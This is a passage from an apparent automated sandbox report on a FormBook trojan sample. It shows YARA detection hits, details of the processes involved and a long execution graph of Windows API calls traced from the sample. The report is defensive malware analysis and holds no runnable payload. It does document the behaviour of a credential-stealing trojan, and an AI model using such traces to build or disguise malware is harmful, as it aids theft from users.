                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.3536085232.0000000000880000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.3536085232.0000000000880000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.3536123647.00000000008D0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.3536123647.00000000008D0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                      Reputation:moderate
                      Has exited:false

                      General

                      Target ID:7
                      Start time:06:45:56
                      Start date:03/09/2024
                      Path:C:\Program Files (x86)\lADwcZzJhzLcMEJhntWadsYrEFIJRBLxxiDKORwMMEmwwhGQBHrkRFnW\SCsLZYqthBle.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Program Files (x86)\lADwcZzJhzLcMEJhntWadsYrEFIJRBLxxiDKORwMMEmwwhGQBHrkRFnW\SCsLZYqthBle.exe"
                      Imagebase:0x1b0000
                      File size:140'800 bytes
                      MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3537571964.0000000005410000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.3537571964.0000000005410000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                      Reputation:high
                      Has exited:false

                      General

                      Target ID:8
                      Start time:06:46:08
                      Start date:03/09/2024
                      Path:C:\Program Files\Mozilla Firefox\firefox.exe
                      Wow64 process (32bit):false
                      Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                      Imagebase:0x7ff6bf500000
                      File size:676'768 bytes
                      MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      Disassembly

                      Reset < >

                        Execution Graph

                        Execution Coverage:3.2%
                        Dynamic/Decrypted Code Coverage:1.5%
                        Signature Coverage:2.9%
                        Total number of Nodes:2000
                        Total number of Limit Nodes:51
                        execution_graph 96184 981098 96189 9842de 96184->96189 96188 9810a7 96210 98a961 96189->96210 96193 984342 96208 984378 96193->96208 96227 9893b2 96193->96227 96195 98436c 96231 9837a0 96195->96231 96196 98441b GetCurrentProcess IsWow64Process 96198 984437 96196->96198 96199 98444f LoadLibraryA 96198->96199 96200 9c3824 GetSystemInfo 96198->96200 96201 98449c GetSystemInfo 96199->96201 96202 984460 GetProcAddress 96199->96202 96205 984476 96201->96205 96202->96201 96204 984470 GetNativeSystemInfo 96202->96204 96203 9c37df 96204->96205 96206 98447a FreeLibrary 96205->96206 96207 98109d 96205->96207 96206->96207 96209 9a00a3 29 API calls __onexit 96207->96209 96208->96196 96208->96203 96209->96188 96235 99fe0b 96210->96235 96212 98a976 96245 99fddb 96212->96245 96214 9842f5 GetVersionExW 96215 986b57 96214->96215 96216 9c4ba1 96215->96216 96217 986b67 _wcslen 96215->96217 96218 9893b2 22 API calls 96216->96218 96220 986b7d 96217->96220 96221 986ba2 96217->96221 96219 9c4baa 96218->96219 96219->96219 96270 986f34 22 API calls 96220->96270 96222 99fddb 22 API calls 96221->96222 96224 986bae 96222->96224 96226 99fe0b 22 API calls 96224->96226 96225 986b85 __fread_nolock 96225->96193 96226->96225 96228 9893c0 96227->96228 96230 9893c9 __fread_nolock 96227->96230 96228->96230 96271 98aec9 96228->96271 96230->96195 96232 9837ae 96231->96232 96233 9893b2 22 API calls 96232->96233 96234 9837c2 96233->96234 96234->96208 96237 99fddb 96235->96237 96238 99fdfa 96237->96238 96241 99fdfc 96237->96241 96255 9aea0c 96237->96255 96262 9a4ead 7 API calls 2 library calls 96237->96262 96238->96212 96240 9a066d 96264 9a32a4 RaiseException 96240->96264 96241->96240 96263 9a32a4 RaiseException 96241->96263 96243 9a068a 96243->96212 96248 99fde0 96245->96248 96246 9aea0c ___std_exception_copy 21 API calls 96246->96248 96247 99fdfa 96247->96214 96248->96246 96248->96247 96250 99fdfc 96248->96250 96267 9a4ead 7 API calls 2 library calls 96248->96267 96251 9a066d 96250->96251 96268 9a32a4 RaiseException 96250->96268 96269 9a32a4 RaiseException 96251->96269 96253 9a068a 96253->96214 96260 9b3820 __dosmaperr 96255->96260 96256 9b385e 96266 9af2d9 20 API calls __dosmaperr 96256->96266 96258 9b3849 RtlAllocateHeap 96259 9b385c 96258->96259 96258->96260 96259->96237 96260->96256 96260->96258 96265 9a4ead 7 API calls 2 library calls 96260->96265 96262->96237 96263->96240 96264->96243 96265->96260 96266->96259 96267->96248 96268->96251 96269->96253 96270->96225 96272 98aed9 __fread_nolock 96271->96272 96273 98aedc 96271->96273 96272->96230 96274 99fddb 22 API calls 96273->96274 96275 98aee7 96274->96275 96276 99fe0b 22 API calls 96275->96276 96276->96272 96277 9dd8dd GetTempPathW 96278 9dd8fa 96277->96278 96278->96278 96279 9b90fa 96280 9b9107 96279->96280 96283 9b911f 96279->96283 96336 9af2d9 20 API calls __dosmaperr 96280->96336 96282 9b910c 96337 9b27ec 26 API calls _strftime 96282->96337 96285 9b9117 96283->96285 96286 9b917a 96283->96286 96338 9bfdc4 21 API calls 2 library calls 96283->96338 96299 9ad955 96286->96299 96289 9b9192 96306 9b8c32 96289->96306 96291 9b9199 96291->96285 96292 9ad955 __fread_nolock 26 API calls 96291->96292 96293 9b91c5 96292->96293 96293->96285 96294 9ad955 __fread_nolock 26 API calls 96293->96294 96295 9b91d3 96294->96295 96295->96285 96296 9ad955 __fread_nolock 26 API calls 96295->96296 96297 9b91e3 96296->96297 96298 9ad955 __fread_nolock 26 API calls 96297->96298 96298->96285 96300 9ad961 96299->96300 96301 9ad976 96299->96301 96339 9af2d9 20 API calls __dosmaperr 96300->96339 96301->96289 96303 9ad966 96340 9b27ec 26 API calls _strftime 96303->96340 96305 9ad971 96305->96289 96307 9b8c3e BuildCatchObjectHelperInternal 96306->96307 96308 9b8c5e 96307->96308 96309 9b8c46 96307->96309 96310 9b8d24 96308->96310 96314 9b8c97 96308->96314 96407 9af2c6 20 API calls __dosmaperr 96309->96407 96414 9af2c6 20 API calls __dosmaperr 96310->96414 96313 9b8c4b 96408 9af2d9 20 API calls __dosmaperr 96313->96408 96317 9b8cbb 96314->96317 96318 9b8ca6 96314->96318 96315 9b8d29 96415 9af2d9 20 API calls __dosmaperr 96315->96415 96341 9b5147 EnterCriticalSection 96317->96341 96409 9af2c6 20 API calls __dosmaperr 96318->96409 96320 9b8c53 __fread_nolock 96320->96291 96323 9b8cab 96410 9af2d9 20 API calls __dosmaperr 96323->96410 96324 9b8cc1 96326 9b8cdd 96324->96326 96327 9b8cf2 96324->96327 96411 9af2d9 20 API calls __dosmaperr 96326->96411 96342 9b8d45 96327->96342 96330 9b8cb3 96416 9b27ec 26 API calls _strftime 96330->96416 96332 9b8ced 96413 9b8d1c LeaveCriticalSection __wsopen_s 96332->96413 96333 9b8ce2 96412 9af2c6 20 API calls __dosmaperr 96333->96412 96336->96282 96337->96285 96338->96286 96339->96303 96340->96305 96341->96324 96343 9b8d6f 96342->96343 96344 9b8d57 96342->96344 96346 9b90d9 96343->96346 96351 9b8db4 96343->96351 96426 9af2c6 20 API calls __dosmaperr 96344->96426 96448 9af2c6 20 API calls __dosmaperr 96346->96448 96347 9b8d5c 96427 9af2d9 20 API calls __dosmaperr 96347->96427 96350 9b90de 96449 9af2d9 20 API calls __dosmaperr 96350->96449 96352 9b8d64 96351->96352 96354 9b8dbf 96351->96354 96359 9b8def 96351->96359 96352->96332 96428 9af2c6 20 API calls __dosmaperr 96354->96428 96356 9b8dcc 96450 9b27ec 26 API calls _strftime 96356->96450 96357 9b8dc4 96429 9af2d9 20 API calls __dosmaperr 96357->96429 96361 9b8e08 96359->96361 96362 9b8e4a 96359->96362 96363 9b8e2e 96359->96363 96361->96363 96396 9b8e15 96361->96396 96433 9b3820 21 API calls __dosmaperr 96362->96433 96430 9af2c6 20 API calls __dosmaperr 96363->96430 96366 9b8e33 96431 9af2d9 20 API calls __dosmaperr 96366->96431 96367 9b8e61 96434 9b29c8 96367->96434 96370 9b8fb3 96373 9b9029 96370->96373 96376 9b8fcc GetConsoleMode 96370->96376 96371 9b8e3a 96432 9b27ec 26 API calls _strftime 96371->96432 96378 9b902d ReadFile 96373->96378 96375 9b8e6a 96377 9b29c8 _free 20 API calls 96375->96377 96376->96373 96381 9b8fdd 96376->96381 96382 9b8e71 96377->96382 96379 9b90a1 GetLastError 96378->96379 96380 9b9047 96378->96380 96383 9b90ae 96379->96383 96384 9b9005 96379->96384 96380->96379 96395 9b901e 96380->96395 96381->96378 96385 9b8fe3 ReadConsoleW 96381->96385 96386 9b8e7b 96382->96386 96387 9b8e96 96382->96387 96446 9af2d9 20 API calls __dosmaperr 96383->96446 96391 9b8e45 __fread_nolock 96384->96391 96443 9af2a3 20 API calls __dosmaperr 96384->96443 96390 9b8fff GetLastError 96385->96390 96385->96395 96440 9af2d9 20 API calls __dosmaperr 96386->96440 96442 9b9424 28 API calls __fread_nolock 96387->96442 96390->96384 96392 9b29c8 _free 20 API calls 96391->96392 96392->96352 96394 9b90b3 96447 9af2c6 20 API calls __dosmaperr 96394->96447 96395->96391 96400 9b906c 96395->96400 96401 9b9083 96395->96401 96417 9bf89b 96396->96417 96398 9b8e80 96441 9af2c6 20 API calls __dosmaperr 96398->96441 96444 9b8a61 31 API calls 2 library calls 96400->96444 96401->96391 96404 9b909a 96401->96404 96445 9b88a1 29 API calls __fread_nolock 96404->96445 96406 9b909f 96406->96391 96407->96313 96408->96320 96409->96323 96410->96330 96411->96333 96412->96332 96413->96320 96414->96315 96415->96330 96416->96320 96418 9bf8a8 96417->96418 96419 9bf8b5 96417->96419 96451 9af2d9 20 API calls __dosmaperr 96418->96451 96422 9bf8c1 96419->96422 96452 9af2d9 20 API calls __dosmaperr 96419->96452 96421 9bf8ad 96421->96370 96422->96370 96424 9bf8e2 96453 9b27ec 26 API calls _strftime 96424->96453 96426->96347 96427->96352 96428->96357 96429->96356 96430->96366 96431->96371 96432->96391 96433->96367 96435 9b29d3 RtlFreeHeap 96434->96435 96436 9b29fc __dosmaperr 96434->96436 96435->96436 96437 9b29e8 96435->96437 96436->96375 96454 9af2d9 20 API calls __dosmaperr 96437->96454 96439 9b29ee GetLastError 96439->96436 96440->96398 96441->96391 96442->96396 96443->96391 96444->96391 96445->96406 96446->96394 96447->96391 96448->96350 96449->96356 96450->96352 96451->96421 96452->96424 96453->96421 96454->96439 96455 9a03fb 96456 9a0407 BuildCatchObjectHelperInternal 96455->96456 96484 99feb1 96456->96484 96458 9a040e 96459 9a0561 96458->96459 96462 9a0438 96458->96462 96511 9a083f IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 96459->96511 96461 9a0568 96512 9a4e52 28 API calls _abort 96461->96512 96473 9a0477 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 96462->96473 96495 9b247d 96462->96495 96464 9a056e 96513 9a4e04 28 API calls _abort 96464->96513 96468 9a0576 96469 9a0457 96471 9a04d8 96503 9a0959 96471->96503 96473->96471 96507 9a4e1a 38 API calls 3 library calls 96473->96507 96475 9a04de 96476 9a04f3 96475->96476 96508 9a0992 GetModuleHandleW 96476->96508 96478 9a04fa 96478->96461 96479 9a04fe 96478->96479 96480 9a0507 96479->96480 96509 9a4df5 28 API calls _abort 96479->96509 96510 9a0040 13 API calls 2 library calls 96480->96510 96483 9a050f 96483->96469 96485 99feba 96484->96485 96514 9a0698 IsProcessorFeaturePresent 96485->96514 96487 99fec6 96515 9a2c94 10 API calls 3 library calls 96487->96515 96489 99fecb 96494 99fecf 96489->96494 96516 9b2317 96489->96516 96492 99fee6 96492->96458 96494->96458 96496 9b2494 96495->96496 96497 9a0a8c CatchGuardHandler 5 API calls 96496->96497 96498 9a0451 96497->96498 96498->96469 96499 9b2421 96498->96499 96500 9b2450 96499->96500 96501 9a0a8c CatchGuardHandler 5 API calls 96500->96501 96502 9b2479 96501->96502 96502->96473 96584 9a2340 96503->96584 96506 9a097f 96506->96475 96507->96471 96508->96478 96509->96480 96510->96483 96511->96461 96512->96464 96513->96468 96514->96487 96515->96489 96520 9bd1f6 96516->96520 96519 9a2cbd 8 API calls 3 library calls 96519->96494 96521 9bd20f 96520->96521 96522 9bd213 96520->96522 96538 9a0a8c 96521->96538 96522->96521 96526 9b4bfb 96522->96526 96524 99fed8 96524->96492 96524->96519 96527 9b4c07 BuildCatchObjectHelperInternal 96526->96527 96545 9b2f5e EnterCriticalSection 96527->96545 96529 9b4c0e 96546 9b50af 96529->96546 96531 9b4c1d 96537 9b4c2c 96531->96537 96559 9b4a8f 29 API calls 96531->96559 96534 9b4c27 96560 9b4b45 GetStdHandle GetFileType 96534->96560 96535 9b4c3d __fread_nolock 96535->96522 96561 9b4c48 LeaveCriticalSection _abort 96537->96561 96539 9a0a97 IsProcessorFeaturePresent 96538->96539 96540 9a0a95 96538->96540 96542 9a0c5d 96539->96542 96540->96524 96583 9a0c21 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 96542->96583 96544 9a0d40 96544->96524 96545->96529 96547 9b50bb BuildCatchObjectHelperInternal 96546->96547 96548 9b50c8 96547->96548 96549 9b50df 96547->96549 96570 9af2d9 20 API calls __dosmaperr 96548->96570 96562 9b2f5e EnterCriticalSection 96549->96562 96552 9b50cd 96571 9b27ec 26 API calls _strftime 96552->96571 96554 9b50d7 __fread_nolock 96554->96531 96555 9b5117 96572 9b513e LeaveCriticalSection _abort 96555->96572 96558 9b50eb 96558->96555 96563 9b5000 96558->96563 96559->96534 96560->96537 96561->96535 96562->96558 96573 9b4c7d 96563->96573 96565 9b501f 96566 9b29c8 _free 20 API calls 96565->96566 96568 9b5071 96566->96568 96567 9b5012 96567->96565 96580 9b3405 11 API calls 2 library calls 96567->96580 96568->96558 96570->96552 96571->96554 96572->96554 96574 9b4c8a __dosmaperr 96573->96574 96575 9b4cb5 RtlAllocateHeap 96574->96575 96576 9b4cca 96574->96576 96581 9a4ead 7 API calls 2 library calls 96574->96581 96575->96574 96578 9b4cc8 96575->96578 96582 9af2d9 20 API calls __dosmaperr 96576->96582 96578->96567 96580->96567 96581->96574 96582->96578 96583->96544 96585 9a096c GetStartupInfoW 96584->96585 96585->96506 96586 98105b 96591 98344d 96586->96591 96588 98106a 96622 9a00a3 29 API calls __onexit 96588->96622 96590 981074 96592 98345d __wsopen_s 96591->96592 96593 98a961 22 API calls 96592->96593 96594 983513 96593->96594 96623 983a5a 96594->96623 96596 98351c 96630 983357 96596->96630 96603 98a961 22 API calls 96604 98354d 96603->96604 96651 98a6c3 96604->96651 96607 9c3176 RegQueryValueExW 96608 9c320c RegCloseKey 96607->96608 96609 9c3193 96607->96609 96611 983578 96608->96611 96621 9c321e _wcslen 96608->96621 96610 99fe0b 22 API calls 96609->96610 96612 9c31ac 96610->96612 96611->96588 96657 985722 96612->96657 96615 984c6d 22 API calls 96615->96621 96616 9c31d4 96617 986b57 22 API calls 96616->96617 96618 9c31ee messages 96617->96618 96618->96608 96620 98515f 22 API calls 96620->96621 96621->96611 96621->96615 96621->96620 96660 989cb3 96621->96660 96622->96590 96666 9c1f50 96623->96666 96626 989cb3 22 API calls 96627 983a8d 96626->96627 96668 983aa2 96627->96668 96629 983a97 96629->96596 96631 9c1f50 __wsopen_s 96630->96631 96632 983364 GetFullPathNameW 96631->96632 96633 983386 96632->96633 96634 986b57 22 API calls 96633->96634 96635 9833a4 96634->96635 96636 9833c6 96635->96636 96637 9833dd 96636->96637 96638 9c30bb 96636->96638 96678 9833ee 96637->96678 96640 99fddb 22 API calls 96638->96640 96642 9c30c5 _wcslen 96640->96642 96641 9833e8 96645 98515f 96641->96645 96643 99fe0b 22 API calls 96642->96643 96644 9c30fe __fread_nolock 96643->96644 96646 98516e 96645->96646 96650 98518f __fread_nolock 96645->96650 96648 99fe0b 22 API calls 96646->96648 96647 99fddb 22 API calls 96649 983544 96647->96649 96648->96650 96649->96603 96650->96647 96652 98a6dd 96651->96652 96656 983556 RegOpenKeyExW 96651->96656 96653 99fddb 22 API calls 96652->96653 96654 98a6e7 96653->96654 96655 99fe0b 22 API calls 96654->96655 96655->96656 96656->96607 96656->96611 96658 99fddb 22 API calls 96657->96658 96659 985734 RegQueryValueExW 96658->96659 96659->96616 96659->96618 96661 989cc2 _wcslen 96660->96661 96662 99fe0b 22 API calls 96661->96662 96663 989cea __fread_nolock 96662->96663 96664 99fddb 22 API calls 96663->96664 96665 989d00 96664->96665 96665->96621 96667 983a67 GetModuleFileNameW 96666->96667 96667->96626 96669 9c1f50 __wsopen_s 96668->96669 96670 983aaf GetFullPathNameW 96669->96670 96671 983ae9 96670->96671 96672 983ace 96670->96672 96673 98a6c3 22 API calls 96671->96673 96674 986b57 22 API calls 96672->96674 96675 983ada 96673->96675 96674->96675 96676 9837a0 22 API calls 96675->96676 96677 983ae6 96676->96677 96677->96629 96679 9833fe _wcslen 96678->96679 96680 9c311d 96679->96680 96681 983411 96679->96681 96682 99fddb 22 API calls 96680->96682 96688 98a587 96681->96688 96684 9c3127 96682->96684 96686 99fe0b 22 API calls 96684->96686 96685 98341e __fread_nolock 96685->96641 96687 9c3157 __fread_nolock 96686->96687 96689 98a59d 96688->96689 96692 98a598 __fread_nolock 96688->96692 96690 9cf80f 96689->96690 96691 99fe0b 22 API calls 96689->96691 96691->96692 96692->96685 96693 9623b0 96707 960000 96693->96707 96695 962493 96710 9622a0 96695->96710 96713 9634c0 GetPEB 96707->96713 96709 96068b 96709->96695 96711 9622a9 Sleep 96710->96711 96712 9622b7 96711->96712 96714 9634ea 96713->96714 96714->96709 96715 98f7bf 96716 98f7d3 96715->96716 96717 98fcb6 96715->96717 96719 98fcc2 96716->96719 96720 99fddb 22 API calls 96716->96720 96808 98aceb 23 API calls messages 96717->96808 96809 98aceb 23 API calls messages 96719->96809 96722 98f7e5 96720->96722 96722->96719 96723 98f83e 96722->96723 96724 98fd3d 96722->96724 96745 98ed9d messages 96723->96745 96750 991310 96723->96750 96810 9f1155 22 API calls 96724->96810 96727 99fddb 22 API calls 96729 98ec76 messages 96727->96729 96728 9d4beb 96818 9f359c 82 API calls __wsopen_s 96728->96818 96729->96727 96729->96728 96732 9d4b0b 96729->96732 96733 98a8c7 22 API calls 96729->96733 96734 98f3ae messages 96729->96734 96735 98fef7 96729->96735 96736 9d4600 96729->96736 96741 9a0242 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 96729->96741 96743 98fbe3 96729->96743 96744 98a961 22 API calls 96729->96744 96729->96745 96746 9a00a3 29 API calls pre_c_initialization 96729->96746 96749 9a01f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 96729->96749 96806 9901e0 256 API calls 2 library calls 96729->96806 96807 9906a0 41 API calls messages 96729->96807 96816 9f359c 82 API calls __wsopen_s 96732->96816 96733->96729 96734->96745 96815 9f359c 82 API calls __wsopen_s 96734->96815 96738 98a8c7 22 API calls 96735->96738 96735->96745 96736->96745 96811 98a8c7 96736->96811 96738->96745 96741->96729 96743->96734 96743->96745 96747 9d4bdc 96743->96747 96744->96729 96746->96729 96817 9f359c 82 API calls __wsopen_s 96747->96817 96749->96729 96751 9917b0 96750->96751 96752 991376 96750->96752 97063 9a0242 5 API calls __Init_thread_wait 96751->97063 96754 991390 96752->96754 96755 9d6331 96752->96755 96819 991940 96754->96819 96756 9d633d 96755->96756 97068 a0709c 256 API calls 96755->97068 96756->96729 96758 9917ba 96760 9917fb 96758->96760 96762 989cb3 22 API calls 96758->96762 96765 9d6346 96760->96765 96767 99182c 96760->96767 96771 9917d4 96762->96771 96763 991940 9 API calls 96764 9913b6 96763->96764 96764->96760 96766 9913ec 96764->96766 97069 9f359c 82 API calls __wsopen_s 96765->97069 96766->96765 96782 991408 __fread_nolock 96766->96782 97065 98aceb 23 API calls messages 96767->97065 96770 991839 97066 99d217 256 API calls 96770->97066 97064 9a01f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 96771->97064 96774 9d636e 97070 9f359c 82 API calls __wsopen_s 96774->97070 96775 991872 97067 99faeb 23 API calls 96775->97067 96777 99153c 96780 991940 9 API calls 96777->96780 96778 9d63d1 97072 a05745 54 API calls _wcslen 96778->97072 96783 991549 96780->96783 96781 99fddb 22 API calls 96781->96782 96782->96770 96782->96774 96782->96781 96784 99fe0b 22 API calls 96782->96784 96791 99152f 96782->96791 96793 9d63b2 96782->96793 96798 9915c7 messages 96782->96798 96829 98ec40 96782->96829 96785 991940 9 API calls 96783->96785 96783->96798 96784->96782 96795 991563 96785->96795 96788 99171d 96788->96729 96790 99167b messages 96790->96788 97062 99ce17 22 API calls messages 96790->97062 96791->96777 96791->96778 96792 991940 9 API calls 96792->96798 97071 9f359c 82 API calls __wsopen_s 96793->97071 96797 98a8c7 22 API calls 96795->96797 96795->96798 96797->96798 96798->96775 96798->96790 96798->96792 96853 9ed4ce 96798->96853 96856 99effa 96798->96856 96913 a0959f 96798->96913 96916 984f39 96798->96916 96922 a0958b 96798->96922 96925 9f744a 96798->96925 96982 9f6ef1 96798->96982 97073 9f359c 82 API calls __wsopen_s 96798->97073 96806->96729 96807->96729 96808->96719 96809->96724 96810->96745 96812 98a8ea __fread_nolock 96811->96812 96813 98a8db 96811->96813 96812->96745 96813->96812 96814 99fe0b 22 API calls 96813->96814 96814->96812 96815->96745 96816->96745 96817->96728 96818->96745 96820 991981 96819->96820 96824 99195d 96819->96824 97074 9a0242 5 API calls __Init_thread_wait 96820->97074 96823 99198b 96823->96824 97075 9a01f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 96823->97075 96828 9913a0 96824->96828 97076 9a0242 5 API calls __Init_thread_wait 96824->97076 96826 998727 96826->96828 97077 9a01f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 96826->97077 96828->96763 96849 98ec76 messages 96829->96849 96830 9a0242 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 96830->96849 96831 99fddb 22 API calls 96831->96849 96832 98fef7 96839 98a8c7 22 API calls 96832->96839 96845 98ed9d messages 96832->96845 96835 9d4b0b 97081 9f359c 82 API calls __wsopen_s 96835->97081 96836 98a8c7 22 API calls 96836->96849 96837 9d4600 96842 98a8c7 22 API calls 96837->96842 96837->96845 96839->96845 96842->96845 96843 98fbe3 96843->96845 96846 9d4bdc 96843->96846 96852 98f3ae messages 96843->96852 96844 98a961 22 API calls 96844->96849 96845->96782 97082 9f359c 82 API calls __wsopen_s 96846->97082 96847 9a00a3 29 API calls pre_c_initialization 96847->96849 96849->96830 96849->96831 96849->96832 96849->96835 96849->96836 96849->96837 96849->96843 96849->96844 96849->96845 96849->96847 96850 9a01f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 96849->96850 96851 9d4beb 96849->96851 96849->96852 97078 9901e0 256 API calls 2 library calls 96849->97078 97079 9906a0 41 API calls messages 96849->97079 96850->96849 97083 9f359c 82 API calls __wsopen_s 96851->97083 96852->96845 97080 9f359c 82 API calls __wsopen_s 96852->97080 97084 9edbbe lstrlenW 96853->97084 97089 989c6e 96856->97089 96859 99fddb 22 API calls 96861 99f02b 96859->96861 96862 99fe0b 22 API calls 96861->96862 96864 99f03c 96862->96864 96863 9df0a8 96902 99f0a4 96863->96902 97187 9f9caa 39 API calls 96863->97187 97132 986246 96864->97132 96868 9df10a 96870 99f0b1 96868->96870 96871 9df112 96868->96871 96869 98a961 22 API calls 96872 99f04f 96869->96872 97103 99fa5b 96870->97103 96873 98b567 39 API calls 96871->96873 96874 986246 CloseHandle 96872->96874 96880 99f0b8 96873->96880 96876 99f056 96874->96876 97136 987510 96876->97136 96879 986246 CloseHandle 96881 99f06c 96879->96881 96882 9df127 96880->96882 96883 99f0d3 96880->96883 97159 985745 96881->97159 96886 99fe0b 22 API calls 96882->96886 97108 986270 96883->97108 96889 9df12c 96886->96889 96893 9df140 96889->96893 97188 99f866 ReadFile SetFilePointerEx 96889->97188 96890 99f085 97167 9853de 96890->97167 96891 9df0a0 97186 986216 CloseHandle messages 96891->97186 96904 9df144 __fread_nolock 96893->96904 97189 9f0e85 22 API calls ___scrt_fastfail 96893->97189 96896 99f0ea 96896->96904 97183 9862b5 22 API calls 96896->97183 96900 99f093 97182 9853c7 SetFilePointerEx SetFilePointerEx SetFilePointerEx 96900->97182 96902->96870 97127 98b567 96902->97127 96903 99f0fe 96907 99f138 96903->96907 96908 986246 CloseHandle 96903->96908 96905 9df069 97185 9eccff SetFilePointerEx SetFilePointerEx SetFilePointerEx WriteFile 96905->97185 96906 99f09a 96906->96902 96906->96905 96907->96798 96909 99f12c 96908->96909 96909->96907 97184 986216 CloseHandle messages 96909->97184 96911 9df080 96911->96902 97246 a07f59 96913->97246 96915 a095af 96915->96798 96917 984f43 96916->96917 96921 984f4a 96916->96921 97352 9ae678 96917->97352 96919 984f59 96919->96798 96920 984f6a FreeLibrary 96920->96919 96921->96919 96921->96920 96923 a07f59 120 API calls 96922->96923 96924 a0959b 96923->96924 96924->96798 96926 9f7474 96925->96926 96927 9f7469 96925->96927 96928 9f7554 96926->96928 96931 98a961 22 API calls 96926->96931 96929 98b567 39 API calls 96927->96929 96930 99fddb 22 API calls 96928->96930 96971 9f76a4 96928->96971 96929->96926 96932 9f7587 96930->96932 96933 9f7495 96931->96933 96934 99fe0b 22 API calls 96932->96934 96935 98a961 22 API calls 96933->96935 96936 9f7598 96934->96936 96937 9f749e 96935->96937 96938 986246 CloseHandle 96936->96938 96939 987510 53 API calls 96937->96939 96940 9f75a3 96938->96940 96941 9f74aa 96939->96941 96942 98a961 22 API calls 96940->96942 97581 98525f 96941->97581 96944 9f75ab 96942->96944 96946 986246 CloseHandle 96944->96946 96945 9f74bf 97623 986350 96945->97623 96947 9f75b2 96946->96947 96949 987510 53 API calls 96947->96949 96951 9f75be 96949->96951 96953 986246 CloseHandle 96951->96953 96952 9f754a 96956 98b567 39 API calls 96952->96956 96955 9f75c8 96953->96955 96954 9ed4ce 4 API calls 96957 9f7502 96954->96957 96960 985745 5 API calls 96955->96960 96956->96928 96957->96952 96958 9f7506 96957->96958 96959 989cb3 22 API calls 96958->96959 96961 9f7513 96959->96961 96962 9f75e2 96960->96962 97632 9ed2c1 26 API calls 96961->97632 96964 9f76de GetLastError 96962->96964 96965 9f75ea 96962->96965 96966 9f76f7 96964->96966 96967 9853de 27 API calls 96965->96967 97636 986216 CloseHandle messages 96966->97636 96970 9f75f8 96967->96970 96969 9f751c 96969->96952 97633 9853c7 SetFilePointerEx SetFilePointerEx SetFilePointerEx 96970->97633 96971->96798 96973 9f75ff 96974 9f7645 96973->96974 96977 9f7619 96973->96977 96975 99fddb 22 API calls 96974->96975 96976 9f7679 96975->96976 96978 98a961 22 API calls 96976->96978 97634 9eccff SetFilePointerEx SetFilePointerEx SetFilePointerEx WriteFile 96977->97634 96980 9f7686 96978->96980 96980->96971 97635 9e417d 22 API calls __fread_nolock 96980->97635 96983 98a961 22 API calls 96982->96983 96984 9f6f1d 96983->96984 96985 98a961 22 API calls 96984->96985 96986 9f6f26 96985->96986 96987 9f6f3a 96986->96987 96988 98b567 39 API calls 96986->96988 96989 987510 53 API calls 96987->96989 96988->96987 96990 9f6f57 _wcslen 96989->96990 96991 9f70bf 96990->96991 96992 9f6fbc 96990->96992 97061 9f70e9 96990->97061 97652 984ecb 96991->97652 96993 987510 53 API calls 96992->96993 96996 9f6fc8 96993->96996 97000 98a8c7 22 API calls 96996->97000 97002 9f6fdb 96996->97002 96997 9f70e5 96999 98a961 22 API calls 96997->96999 96997->97061 96998 984ecb 94 API calls 96998->96997 97001 9f711a 96999->97001 97000->97002 97004 98a961 22 API calls 97001->97004 97003 9f7027 97002->97003 97005 9f7005 97002->97005 97008 98a8c7 22 API calls 97002->97008 97006 987510 53 API calls 97003->97006 97007 9f7126 97004->97007 97009 9833c6 22 API calls 97005->97009 97010 9f7034 97006->97010 97011 98a961 22 API calls 97007->97011 97008->97005 97012 9f700f 97009->97012 97013 9f703d 97010->97013 97014 9f7047 97010->97014 97015 9f712f 97011->97015 97017 987510 53 API calls 97012->97017 97018 98a8c7 22 API calls 97013->97018 97783 9ee199 GetFileAttributesW 97014->97783 97016 98a961 22 API calls 97015->97016 97021 9f7138 97016->97021 97022 9f701b 97017->97022 97018->97014 97020 9f7050 97023 9f7063 97020->97023 97026 984c6d 22 API calls 97020->97026 97024 987510 53 API calls 97021->97024 97025 986350 22 API calls 97022->97025 97028 987510 53 API calls 97023->97028 97034 9f7069 97023->97034 97027 9f7145 97024->97027 97025->97003 97026->97023 97029 98525f 22 API calls 97027->97029 97030 9f70a0 97028->97030 97031 9f7166 97029->97031 97784 9ed076 57 API calls 97030->97784 97033 984c6d 22 API calls 97031->97033 97035 9f7175 97033->97035 97034->97061 97036 9f71a9 97035->97036 97038 984c6d 22 API calls 97035->97038 97037 98a8c7 22 API calls 97036->97037 97039 9f71ba 97037->97039 97040 9f7186 97038->97040 97041 986350 22 API calls 97039->97041 97040->97036 97043 986b57 22 API calls 97040->97043 97042 9f71c8 97041->97042 97044 986350 22 API calls 97042->97044 